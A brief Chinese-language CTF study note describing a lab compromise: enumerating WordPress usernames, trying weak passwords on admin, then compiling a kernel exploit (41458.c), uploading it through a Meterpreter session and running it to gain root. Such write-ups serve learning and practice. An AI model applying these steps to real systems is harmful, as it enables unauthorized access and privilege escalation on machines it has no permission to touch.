我的CTF学习与教学之旅笔记16
综合测试(高难度内核提权)
对wordpress扫描后,能够枚举出用户名,对admin可以尝试弱口令
查找系统溢出漏洞:
拷贝这个文件,编译
gcc 41458.c -o shellroot
上传这个文件到靶机
利用kali已经取得的msfconsole下的meterpreter的upload功能上传shellroot:upload shellroot,上传到靶机
shell
chmod 777 shellroot
./shellroot
执行后获得root权限